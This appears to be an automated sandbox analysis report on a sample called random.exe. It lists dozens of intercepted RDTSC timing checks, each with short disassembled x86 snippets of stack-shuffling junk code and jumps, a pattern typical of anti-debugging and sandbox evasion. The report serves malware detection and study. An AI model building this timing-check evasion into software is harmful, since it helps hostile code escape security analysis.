Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CBD93 second address: 10CBDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F980CCD224Eh 0x0000000d jmp 00007F980CCD224Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB4DC second address: 10CB4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB4E2 second address: 10CB4E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB4E8 second address: 10CB4FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F980CD044E2h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB4FF second address: 10CB512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F980CCD2248h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB512 second address: 10CB53A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F980CD044EEh 0x00000008 jo 00007F980CD044F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CB683 second address: 10CB6A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F980CCD2253h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CFC87 second address: 10CFC90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CF071 second address: 10CF075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CF075 second address: 10CF07C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CF07C second address: 10CF082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CF2F7 second address: 10CF2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10CF7DD second address: 10CF839 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jl 00007F980CCD2246h 0x0000000d jmp 00007F980CCD2254h 0x00000012 pop ecx 0x00000013 jmp 00007F980CCD2259h 0x00000018 jl 00007F980CCD2256h 0x0000001e jmp 00007F980CCD2250h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 jno 00007F980CCD2246h 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D20B6 second address: 10D20C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F980CD044D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D20C0 second address: 10D20CA instructions: 0x00000000 rdtsc 0x00000002 je 00007F980CCD2246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10277D9 second address: 10277DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10277DE second address: 10277E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10277E3 second address: 10277EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10277EB second address: 1027806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F980CCD2253h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1027806 second address: 102780C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D666A second address: 10D666E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D690C second address: 10D6912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D6912 second address: 10D692B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F980CCD2246h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D692B second address: 10D6931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D6D30 second address: 10D6D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D6D36 second address: 10D6D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F980CD044E4h 0x0000000c pop edx 0x0000000d js 00007F980CD044DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D6D5A second address: 10D6D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jbe 00007F980CCD2246h 0x0000000d jnl 00007F980CCD2246h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D6D6F second address: 10D6D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BD43 second address: 107BDCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F980CCD224Dh 0x00000011 movsx edx, dx 0x00000014 pop edx 0x00000015 mov ebx, dword ptr [ebp+12488EBFh] 0x0000001b movsx edi, si 0x0000001e add eax, ebx 0x00000020 mov dword ptr [ebp+122D1F37h], esi 0x00000026 nop 0x00000027 jmp 00007F980CCD2252h 0x0000002c push eax 0x0000002d jmp 00007F980CCD2258h 0x00000032 nop 0x00000033 or dword ptr [ebp+122DB573h], ebx 0x00000039 push 00000004h 0x0000003b sub dword ptr [ebp+122D383Dh], ecx 0x00000041 nop 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F980CCD2251h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D702A second address: 10D7032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D7032 second address: 10D703D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D703D second address: 10D7063 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F980CD044E9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DD58C second address: 10DD5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F980CCD2252h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F980CCD2254h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DD5BD second address: 10DD5C7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DD89C second address: 10DD8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD2254h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DDDF9 second address: 10DDDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DDDFF second address: 10DDE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F980CCD2251h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DE957 second address: 10DE967 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F980CD044D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DE967 second address: 10DE96B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DEF58 second address: 10DEF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DEF5C second address: 10DEF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E7B5F second address: 10E7B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F980CD044E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E7B6E second address: 10E7B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E7B74 second address: 10E7B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E8225 second address: 10E8239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F980CCD2246h 0x0000000e js 00007F980CCD2246h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E8650 second address: 10E866D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DBh 0x00000007 jg 00007F980CD044D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F980CD044E9h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F22B6 second address: 10F22BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0881 second address: 10F0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0887 second address: 10F088B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F088B second address: 10F088F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0E7F second address: 10F0E85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0E85 second address: 10F0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0E89 second address: 10F0E97 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F980CCD2246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F0E97 second address: 10F0E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F116B second address: 10F1172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F1172 second address: 10F1191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F1191 second address: 10F11AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F980CCD2246h 0x0000000a jmp 00007F980CCD224Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F1301 second address: 10F1305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7BF4 second address: 10F7BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7BF8 second address: 10F7BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7BFE second address: 10F7C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7C0A second address: 10F7C27 instructions: 0x00000000 rdtsc 0x00000002 je 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F980CD044DCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7C27 second address: 10F7C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7DBB second address: 10F7DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F980CD044D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7DDF second address: 10F7DEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7DEB second address: 10F7E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CD044E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7E03 second address: 10F7E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7E17 second address: 10F7E1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7F81 second address: 10F7F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F7F87 second address: 10F7F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F980CD044D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11041B2 second address: 11041B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1103F09 second address: 1103F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A29 second address: 1112A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A2D second address: 1112A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A33 second address: 1112A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F980CCD2252h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A4F second address: 1112A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A53 second address: 1112A5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1112A5E second address: 1112A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CD044DBh 0x00000009 pop edx 0x0000000a jl 00007F980CD044F2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111852F second address: 1118537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1118537 second address: 111853F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 112624A second address: 1126253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11264B6 second address: 11264C0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 112A631 second address: 112A635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 112C02F second address: 112C035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 112C035 second address: 112C056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F980CCD2252h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jl 00007F980CCD2246h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 113B496 second address: 113B4A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 114965A second address: 1149666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F980CCD2246h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1149666 second address: 114966C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 114966C second address: 1149690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F980CCD224Dh 0x0000000a push edx 0x0000000b jmp 00007F980CCD224Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1149690 second address: 11496B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 jns 00007F980CD044D6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F980CD044E7h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1149269 second address: 114927C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F980CCD224Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115F4D3 second address: 115F4E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F980CD044DCh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115F4E6 second address: 115F4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F980CCD224Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E486 second address: 115E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F980CD044D6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E491 second address: 115E49C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F980CCD2246h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E5E9 second address: 115E5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F980CD044D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E717 second address: 115E729 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F980CCD224Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E729 second address: 115E753 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 jg 00007F980CD044ECh 0x0000000c jmp 00007F980CD044E6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E753 second address: 115E759 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
